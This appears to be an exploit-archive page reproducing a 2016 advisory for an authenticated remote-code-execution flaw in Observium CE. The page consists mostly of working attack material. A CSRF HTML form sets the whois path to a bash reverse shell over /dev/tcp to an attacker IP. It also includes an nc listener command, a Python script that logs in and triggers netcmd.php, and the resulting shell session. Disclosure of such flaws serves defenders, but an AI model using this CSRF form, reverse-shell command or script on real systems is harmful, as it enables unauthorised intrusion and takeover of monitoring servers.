扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 |
# Exploit title: Observium Commercial - Authenticated RCE # Author: Dolev Farhi # Contact: dolevf at protonmail.com # Date: 28-04-2016 # Vendor homepage: http://observium.org/ # Software version: CE 0.16.7533 Authenticated remote code execution Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener root@pt:~# nc -lvp 4444 listening on [any] 4444 ... and a CSRF which looks like this: <!-- <html> <div align="center"> <pre> <h2><b>CSRF<b></h2> <body> <form action="http://<observiumIP>/settings/section=paths/" method="POST"> <input type="hidden" name="temp_dir" value="" /> <input type="hidden" name="varset_temp_dir" value="" /> <input type="hidden" name="varset_rrdtool" value="" /> <input type="hidden" name="fping" value="" /> <input type="hidden" name="varset_fping" value="" /> <input type="hidden" name="fping6" value="" /> <input type="hidden" name="varset_fping6" value="" /> <input type="hidden" name="svn" value="" /> <input type="hidden" name="varset_svn" value="" /> <input type="hidden" name="snmpget" value="" /> <input type="hidden" name="varset_snmpget" value="" /> <input type="hidden" name="snmpwalk" value="" /> <input type="hidden" name="varset_snmpwalk" value="" /> <input type="hidden" name="snmpbulkget" value="" /> <input type="hidden" name="varset_snmpbulkget" value="" /> <input type="hidden" name="snmpbulkwalk" value="" /> <input type="hidden" name="varset_snmpbulkwalk" value="" /> <input type="hidden" name="snmptranslate" value="" /> <input type="hidden" name="varset_snmptranslate" value="" /> <input type="hidden" name="ipmitool" value="" /> <input type="hidden" name="varset_ipmitool" value="" /> <input type="hidden" name="virsh" value="" /> <input type="hidden" name="varset_virsh" value="" /> <input type="hidden" name="wmic" value="" /> <input type="hidden" name="varset_wmic" value="" /> <input type="hidden" name="git" value="" /> <input type="hidden" name="varset_git" value="" /> <input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" /> <input type="hidden" name="varset_whois" value="" /> <input type="hidden" name="whois_custom" value="1" /> <input type="hidden" name="file" value="" /> <input type="hidden" name="varset_file" value="" /> <input type="hidden" name="dot" value="" /> <input type="hidden" name="varset_dot" value="" /> <input type="submit" name="submit" value="save" /> </form> </body> </div> </html> or by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit'and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the whois parameter which gives us a reverse shell on the machine: you may also use the following python instead: """ import sys import urllib import urllib2 import cookielib #!/usr/bin/python username = 'test' password = '123456' timeout = 10 try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''}) opener.open('http://observium-server', login_data, timeout=timeout) url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8' resp = opener.open(url) except Exception, e: print e sys.exit(1) """ listening on [any] 4444 ... 192.168.2.155: inverse host lookup failed: Unknown host connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413 bash: no job control in this shell bash: /root/.bashrc: Permission denied bash-4.1$ ls -l /opt ls -l /opt total 48944 drwxrwxr-x12 1000 1000 4096 Apr 27 13:47 observium -rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz drwxr-xr-x.2 root root 4096 Mar 262015 rh |
体验盒子
